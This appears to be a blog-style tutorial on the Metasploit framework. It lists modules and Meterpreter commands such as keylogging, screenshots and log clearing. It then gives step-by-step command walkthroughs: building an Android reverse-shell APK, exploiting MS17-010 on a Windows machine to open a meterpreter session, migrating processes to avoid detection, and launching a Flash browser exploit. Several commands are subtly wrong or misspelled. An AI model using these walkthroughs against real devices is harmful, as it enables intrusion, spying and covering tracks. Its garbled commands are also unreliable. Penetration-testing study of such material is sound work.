Metasploit - A Must-Have Pen Testing Tool for Security Engineers and Analysts
Disclaimer: This is strictly for educational purposes and to update on technical possibilities. Remember that this is a hacking tool, and one can face legal action for illegal usage.
Caution: Make a contract or agreement with any organization before using Metasploit on their system, within limits and follow the tool’s permitted terms of use.
Prior to Metasploit, pen testers had to perform all probes manually by using a variety of tools that may or may not have supported the platform they were testing, writing their own code by hand, and introducing it onto networks manually. Remote testing was virtually unheard of, and that limited a security specialist’s reach to the local area and companies spending a fortune on in-house IT or security consultants. Metasploit once it is installed, it is used to obtain information about the target either through port scanning, OS fingerprinting or using a vulnerability scanner to find a way into the network. Then, it is just a simple matter of selecting an exploit and your payload. The tool used to develop and run exploit code on remote target systems. Metasploit comes pre-installed on the Kali Linux operating system. Metasploit provides deep customizability, giving pen testers full access to source code and the ability to add custom modules. Metasploit can integrate seamlessly with elements such as Windows patch enumeration, SNMP scanning during the information collection phase of a penetration test. It also provides a bridge to tenable’s vulnerability scanner, Nessus. Metasploit integrates with almost any reconnaissance tool, allowing you to identify the vulnerability you want.
When you find a vulnerability, you can search the extensible Metasploit database for an exploit that cracks it open. You match the exploit to an appropriate payload for the task. Metasploit provides a full set of post-exploitation tools, with new features added each year. For example, one option is to create a persistent backdoor that remains on the machine even after a reboot. Other tools include packet sniffing, privilege escalators, screen capture, pivoters, and keyloggers. Metasploit also offers a fuzzier for identifying potential security flaws in binary and an expanding selection of auxiliary modules. File System Commands in Meterpreter refer to a set of commands that allow an attacker to manipulate and interact with the file system of a target system. These commands provide an attacker with the ability to perform tasks such as retrieving files, uploading files, and creating new directories on the target system. Once weakness is identified, choose an exploit and payload to penetrate the chink in the armor. If the exploit is successful, the payload gets executed at the target, and the user gets a shell to interact with the payload. One of the most popular payloads to attack Windows systems is Meterpreter – an in-memory-only interactive shell. Once on the target machine, Metasploit offers various exploitation tools for privilege escalation, packet sniffing, pass the hash, keyloggers, screen capture, plus pivoting tools. Users can also set up a persistent backdoor if the target machine gets rebooted
Auxiliary: It is a piece of code written to perform a particular task. Metasploit has more than 1,000 auxiliary modules that perform various tasks like scanning, fuzzing, sniffing, and much more. The auxiliaries are: Admin, Analyze, Bnat, Client, Crawler, Docx, Dos, Fileformat, Fuzzers, Gather, Parser, pdf, Scanner, Server, Sniffer, Spoof, Sqli, Voip, Vslpoit
Payloads: If the exploit is successful, the payload gets executed at the target, and the user gets a shell to interact with the payload. It is the action that needs to be performed after the complete execution of an exploit. Metasploit has around 42 payloads that can be classified into (i) Singles (ii) Stagers (iii) Stages
Exploits: The essence of the framework is to offer exploits that you can use for various vulnerabilities. An exploit is a code that takes advantage of a software vulnerability or security flaw and you will use this code on the target system to take advantage of the vulnerabilities present in the target system. Following are the categories of exploits that are available in Metasploit: Aix, Android, Apple_io, Bsdi, Dialup, Firefox, FreeBSD, Hpux, Lrix, Linux, Mianframe, Multi, Netware, Osx, Solaris, Unix, Windows.
Encoders: It helps in generating a wide variety of payloads that you can send to the target in multiple ways to perform any task without being detected by the security software in the target system. It uses algorithms and techniques to remain unseen by the detectiveware. The encoders are Cmd, Generic,Mispsbe, Mispsle,Php,Ppc, Ruby, Sparc, X64,X86.
Post: Once basic entry is achieved using the exploits, one can make use of the post modules to further infiltrate the target system, and this must be done ethically. This is when lateral movement occurs by Escalating user privileges to administrator or root. The exploitation modules are Aix, Android, Cisco, Firefox, Hardware, Juniper, Linux, Multi, Osx, Solaris, Windows
Evasion: This allows evading without being detected by the defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metsam, and anti-emulation are used to achieve this.
Metasploit has multiple interfaces including;
(1) msfconsole - an interactive command-line like interface
(2) msfcli - a literal Linux command line interface
(3) Armitage - a GUI-based third party application
(4) msfweb - browser based interface
Now let us go into Metasploit in action.
Metasploit is a Framework that helps to create payloads in form of apk, exe, and php formats that can be executed on the target machine, and once the script starts running, it provides a reverse shell.
A reverse shell is when an attacker executes a malicious code from the victim’s machine, and it connects back to the attacker’s machine giving him access to the target computer.
TERMS:
RHOSTS: This stands for "Remote Hosts." It specifies the IP address or addresses of the target system(s) you are trying to exploit.
RPORT: This stands for "Remote Port." It specifies which port on the target system to attack. Often, services have default ports, like HTTP on port 80, but it can differ based on the configuration.
TARGETURI: This is the directory path on the target system the exploit will target. For example, if you're exploiting a web application, the TARGETURI might be the path to that application on the web server, such as /manager.
LHOST: This stands for "Local Host." It's the IP address of your machine (the attacker's machine), which will receive the connection from the exploited target.
LPORT: This stands for "Local Port." Like RPORT, this is the port on your machine that will listen for incoming connections from the target.
Payload = Backdoor file which is going to be used for the OS like Windows, Linux, Mac, Android.
The term “hacking” has been used for many years in different contexts. It is often referred to as “cracking” when referring to breaking into computers or networks for malicious purposes. keyloggers and screen recorders, which are used for spying on someone else’s device. These tools can be installed on the victim’s machine without their knowledge or consent. Once they are installed, they will allow you to see everything that happens on the victim’s computer and even take control of it remotely if desired. Windows hacking tools like Nmap, Nessus, Nikto, Kismet, NetStumbler, Acunetix, Netsparker.
Intruder are used to hack Windows-based operating systems. Metasploit penetration test begins with the information gathering phase, wherein Metasploit integrates with various reconnaissance tools like Nmap, SNMP scanning, and Windows patch enumeration, and Nessus to find the vulnerable spot in your system. Once the weakness is identified, choose an exploit and payload to penetrate the chink in the armor. If the exploit is successful, the payload gets executed at the target, and the user gets a shell to interact with the payload. One of the most popular payloads to attack Windows systems is Meterpreter – an in-memory-only interactive shell. Once on the target machine, Metasploit offers various exploitation tools for privilege escalation, packet sniffing, pass the hash, keyloggers, screen capture, plus pivoting tools. Users can also set up a persistent backdoor if the target machine gets rebooted.
Command shell payloads that enable users to run scripts or random commands against a host. Dynamic payloads that allow testers to generate unique payloads to evade antivirus software. Meterpreter payloads that allow users to commandeer device monitors using VMC and to take over sessions or upload and download files. Static payloads that enable port forwarding and communications between networks
Some basics commands of Metasploit are search, back, info, help, and exit.
Network Commands
ipconfig: Show network interface configuration
portfwd: Forward packets
route: View / edit network routing table
Meterpreter Commands
sysinfo Display system in formation
ps List and display running processes
kill (PID) Terminate a running process
getuid Display user ID
upload or download Upload / download a file
pwd or lpwd Print working directory ( local / remote)
cd or lcd Change directory ( local or remote)
cat Display file content
bglist show background running scripts
bgrun make a script run in the background
bgkill terminate a background process
background Move active session to background
edit <FILE Name> Edit a file in vi editor
shell Access shell on the target machine
migrate <PID> Switch to another process
idletime Display idle time of user
screenshot Take a screenshot
clearev Clear the system logs
? or Help Help showing all the commands
exit / quit : Exit the Meterpreter session
shutdown / reboot Restart the system
use Extension load
channel Show active channels
Handling Commands
getpid: Display the process ID
getuid: Display the user ID
ps: Display running process
Kill: Stop and terminate a process
getprivs Shows multiple privileges as possible
reg Access target machine registry
Shell Access target machine shell
execute: Run a specified
migrate: Move to a given destination process ID
Interface/Output commands
enumdesktops Show all available desktops
Getdesktop Display current desktop
keyscan_ start Start keylogger in target machine
Keyscan_ stop Stop keylogger in target machine
set _desktop Configure desktop
keyscan_dump Dump keylogger content
MSFVenom Commands
SWITCH SYNTAX DESCRIPTION
-p – p (Payload option) Display payload standard options
– l – l ( list type) List module type i .e payload, encoders
– f – f ( format ) output format
– e -e (encoder) Define which encoder to use
-a – a (Architecture or platform Define which platform to use
-s -s (Space) Define maximum payload capacity
-b -b (characters) Define set of characters not to use
领英推荐
– i – i (Number of times) Define number of times to use encoder
-x -x (File name) Define a custom file to use as template
– o -o (output) Save a payload
– h -h Help
How to Hack Your personal Android Phone
(Assume port number and use ifconfig or ipconfig to obtain your ip address depend on your operating system. Your phone and your computer have to be in the same network to carry out this ethical hack.)
Enter "msfvenom -p android/meterpreter/reverse_tcp LHOST={host} LPORT={port} .o main.apk"
Enter "clear"
Enter "msfconsole"
Enter "use exploit/multi/handler"
Enter "set payload android/meterpreter/reverse_tcp
Enter "set LHOST XXX....your...IP...address"
Enter "set LPORT XXX....same port number you used in the first command"
Enter "exploit"
readable response [*] started reverse TCP handler on xxx....ip..:...port no
Do not forget there is a payload called "main.apk" that was already generated on your computer file. Either by email or any other means, transfer that payload to your phone. If you have your phone attached via Bluetooth or or physical connection, transfer the payload to your phone.
. Once the payload called main.apk is now on your phone, you may now download it by clicking on it. By clicking and opening the payload, leaves a message on the console that there is now access. abd takes you to the meterpreter. The complete access is now yours.
Enter "help" to see various activities that can be done with the hacked phone. From that moment, you may do many things remotely with your hacked phone.
How to find vulnerabilities/weakness to Hack in your personal window computer system.
Have your Kali Linux running on the side , then Go to your targeted windows computer
Enter "ipconfig" to obtain the ipv4 address as the targeted ip address
Back to your kali linux and Enter " nmap ...ipv4 address obtained from the window to scan
if the host/computer is not active is down, enter "nmap .....ipv4 address... -Pn"
A dropdown of open ports will be shown. You may google more about what those open ports are meant for and the services that they actually share.
Enter "nmap ....ipv4..address -Pn -sV" where sv is the specific version and more useful information will be obtained.
To go to metasploit, Enter "sudo metasploit"
and then search for others you want by using search as the first word. For example, Enter "search smb" or Enter "grep scanner search smb" . a list of options of vulnerability attack drops down, pick any type of possible vulnerability that is close to your area of interes
.For the learning purposes, i will be picking, " auxiliary/scanner/smb/smb_ms17_010". exploiting MS17-010 most often leads to SYSTEM level access through Remote Code Execution (RCE) that returns a reverse shell to the attacker’s machine. The most common method of exploiting MS17-010 is by using Metasploit’s ‘windows/smb/ms17_010_eternablue’ module.
Enter "use auxiliary/scanner/smb/smb_ms17_010"
Enter "show options"
Enter "set RHOSTS .....ipv4 that we obtained earlier(targeted windows machine)
Enter "run" You should have some imformation displaying whether system is vulnerable to the attack. So far we arrived at finding vulnerabilities that is associated with the services from the system. After having found the vulnerabilities, How do we attack based on that vulnerabilities found.
Enter "search smb" OR Enter "grep exploit search smb" . There is a list of dropdown of exploits that are usable for ms17_010 and for this educational reason, i am hereby selecting
Enter "use exploit/windows/smb/ms17_010_externalblue" or Enter "use exploit/windows/smb/ms17_010_psexec"
Enter "show options"
Enter "SET RHOSTS .....ipv4 address of the window computer"
Enter "set payload"
Enter "set payload/windows" This will give dropdown of all the possibilities of the payloads and you may choose
Enter "set payload windows/meterpreter/reverse_http" Do not forget google is our friend for any of the exploit and hacking jargons. Read extensively and your insights will be like fire.
Enter "show options"
Enter "exploit"
Enter "set LHOST" only if it is not being set but it will be set as that is the live host. use ifconfig to obtain your ip address as usual for kali linux.
At this point meterpreter session should be opened, which indicates , the window system is bein hacked. This could be verified by:
Enter "sysinfo"
Enter "Help" This will give all commands to get control and usage of the hacked window computer.
Enter "ps" Enlists al the process running on the computer and that could be migrated by entering
Enter "migrate xxxx (where xxxx is the no of the onedrive.exe. Therefore, Migrating into another process reduces the chance of getting detected. More precisely, a process with a name generated by Metasploit (typically random alphanumeric characters, e. g., YIhXxjfm.exe ) looks quite suspicious in the task manager)
Enter "screensh" To save the
Enter "screenshot" to save to the folder that has the onedrive.exe. Find the folder and doubleclick on it, then you have a complete access the hacked window computer.
How to exploit adobe_flash_shader_drawing_fill with the use of command is as follows:
Enter "Use exploit/multi/browser/ adobe_flash_shader_drawing_fill"
Enter "show options"
Enter "set srvhost ipv4 address......."
Enter "set srvport 80"
Enter "show options"
Enter "show payloads"
Enter "set payload linux/x86/exec"
Enter "show targets"
Enter "set target 1"
Enter "show payloads"
Enter "show advanced"
Enter "set displayablepayloadhandler true" (To change the advanced settings)
Enter "show encoders"
Enter "show nops"
Enter "show evasion"
How to gather information (Reconnaissance)
Enter "nmap -sT .....ipv4 address."
Enter "nmap -sS ......ipv4 address..."
Enter "search ssh -version" or "phpMyAdmin"
Enter "use auxiliary/scanner/ssh/ssh-version"
Enter "options"
Enter "set RHOSTS ....ipv4 address."
Enter "set THREADS ....available.....on the screen...".
Enter "run"
Conclusion:
Metasploit can produce unwanted results. Many exploits are designed to apply buffer overflows, race conditions, or other software vulnerabilities. These exploits pose a risk because vulnerabilities could destabilize the target system. Many exploits could lead to unexpected denial of service, application crashes, system restarts, and unexpected application behavior. Ensure the organization ordering the penetration test have an emergency response plan to prepare for these situations. Metasploit is preferred to other highly paid penetration testing tools because it allows accessing its source code and adding specific custom modules. The Metasploit Framework is an open-source pen testing and development platform that provides you with access to the latest exploit code for various applications, operating systems, and platforms. You can leverage the power of the Metasploit Framework to create additional custom security tools or write your own exploit code for new vulnerabilities. Reconnaissance tool you can think of integrates with Metasploit, making it possible to find the weaknesses. Once you have identified a weakness, hunt through Metasploit’s large and extensible database for the exploit that will crack open that chink and get you in.
References: